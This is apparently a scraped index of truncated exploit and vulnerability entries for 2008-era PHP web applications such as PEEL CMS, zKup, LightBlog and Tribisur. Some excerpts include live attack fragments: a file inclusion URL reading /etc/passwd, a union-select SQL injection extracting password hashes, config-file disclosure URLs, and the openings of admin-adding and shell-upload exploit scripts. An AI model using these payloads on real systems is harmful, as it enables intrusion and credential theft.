Design/Logic Flaw

admin/modifconfig.php in Blog Pixel Motion aka PixelMotion does not require admin authentication, which allows remote authenticated users to upload arbitrary PHP scripts in a ZIP archive, which is written to templateZip/ and then automatically extracted under templates/ for execution via a direct...

mole-disclose.txt

Mole v2.1.0 viewsource.php Remote File Disclosure Vulnerability Script : http://sourceforge.net/project/showfiles.php?groupid=164171 Vuln Code : Mole: Template viewer POC : /mole210/viewsource.php?dirn=include/config.inc.php /mole210/viewsource.php?fname=include/config.inc.php...

PHP 5.x < 5.2 Multiple Vulnerabilities

According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2. Such versions may be affected by several buffer overflows. To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the remote server or to manipulate several...

PEEL CMS Admin Hash Extraction and Remote Upload Exploit

No description provided by source. !/usr/bin/php ?php /---------------------------------------------------------------\ Exploit: PEEL CMS Admin Hash Extraction and Remote Upload Credits: Charles "real" F. charlesfolathotmail.fr URL: http://realn.free.fr/ Date: 03-18-08 Targets: PEEL PREMIUM PEEL...

zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit

Exploit for unknown platform in category web applications ============================================ zKup CMS 2.0 Date: 03-08-2008 Conditions: None. This exploit add a new zKup admin. / print "\n"; print " zKup CMS v2.0 \n\n"; if$argc \n eg: php zkup2adminexploit.php http://127.0.0.1/votresite/...

Dynamic photo Gallery 1.02 - albumID SQL Injection

Dynamic photo Gallery 1.02 - albumID SQL Injection Aria-Security Team http://Aria-Security.Net ---------------------------- Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php Original Link:...

Simple PHP Scripts Gallery 0.x - &#039;index.php&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/28056/info Simple PHP Scripts 'gallery' is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an...

LightBlog 9.6 - &#039;Username&#039; Local File Inclusion

lightblog 9.6 local file inclusion vulnerability download http://www.publicwarehouse.co.uk/phpscripts/lightblog.php author muuratsalo contact muuratsaloatgmail.com exploit http://localhost/LightBlog9.6/viewmember.php?username=../../../../../../../../../../etc/passwd%00 milw0rm.com 2008-02-18...

Mix Systems CMS (parent/id) Remote SQL Injection Exploit

No description provided by source. ? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "----------------------------antichat.ru------------------------"."\n"; if $argc!=4...

wdcs-xss.txt

Aria-Security Team Persian Security Network httP://Aria-Security.Net --------------------------------------------- Shoutz: Aura, imm0rtal, Soot.Hackers, iM4N, A Special Thanks to my dear friend Mhp0rtal for his great help in order to find this vuln. Vendor: http://www.softwebsnepal.com Demo:...

Mix Systems CMS - &#039;parent/id&#039; SQL Injection

? echo "\n"; echo "-------------------------Mix Systems CMS--------------------------"."\n"; echo "-----------------------coded by : halkfild------------------------"."\n"; echo "----------------------------antichat.ru------------------------"."\n"; if $argc!=4 echo " Usage: php ".$argv0." host...

WordPress fGallery 'fim_rss.php' 'album' Parameter SQL Injection

The remote host is running fGallery, a third-party image gallery plugin for WordPress. The version of fGallery installed on the remote host fails to sanitize input to the 'album' parameter of the 'fimrss.php' script before using it in a database query. Regardless of PHP's 'magicquotesgpc' setting...

LulieBlog 1.0.1 - Remote Authentication Bypass

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LulieBlog 1.0.1 delete id Remote Admin Bypass Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- bug found by ka0x contact: D.O.M TEAM 2008 we are: ka0x, an0de, xarnuz from spain download:...

LulieBlog 1.0.1 - Remote Authentication Bypass

LulieBlog 1.0.1 - Remote Authentication Bypass -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LulieBlog 1.0.1 delete id Remote Admin Bypass Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- bug found by ka0x contact: D.O.M TEAM 2008 we are: ka0x, an0de,...

Tribisur &lt;= 2.0 Remote SQL Injection Exploit

No description provided by source. !/usr/bin/php -q ?php echo "Tribisur = 2.0 Remote SQL Injection Exploit\r\n"; echo "Coded by x0kster -x0ksterATgmailDOTcom - \r\n"; / Script Download : http://www.comscripts.com/scripts/php.tribisur-20.1211.html Bug 1 in modules/forum/liste.php : First, this...

WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload

AUTHOR : H-T TeaM HouSSaMix ToXiC350 HOME : http://no-hack.net Script : Wordpress Plugin Wp-FileManager Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip BUG : Remote File Upload Vulnerability Shell Upload Exploit | 3xpl0it4t10n : This file allowed you to upload directly a P...

Tribisur <= 2.0 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================ Tribisur And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2...

Bypass the web environment keyword monitoring attempt-vulnerability warning-the black bar safety net

by Don not Fox http://blog.wang1.cn Problem: win2003+php environment, server installation similar to the“best information monitoring system,”The thing is, for some set of keywords for blocking. So I'm in phpshell, Execute sql queries and system command, you be prompted file does not have permissi...

Unfixed XSS vulnerability at kkanari.org

Security researcher tweetycoaster, has submitted on 28/12/2007 a cross-site-scripting XSS vulnerability affecting kkanari.org, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 16/01/2008. It is currently...

mBlog 1.2 - &#039;page&#039; Remote File Disclosure

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: : : : vuln.: mBlog 1.2 Remote File Disclosure Vulnerability : : script info and download: http://www.c97.net/dl/index.php?act=view&id=8 : : no dork for s-kiddie ; : : : : author: irk4zatyahoo.pl : : greets to: str0ke,...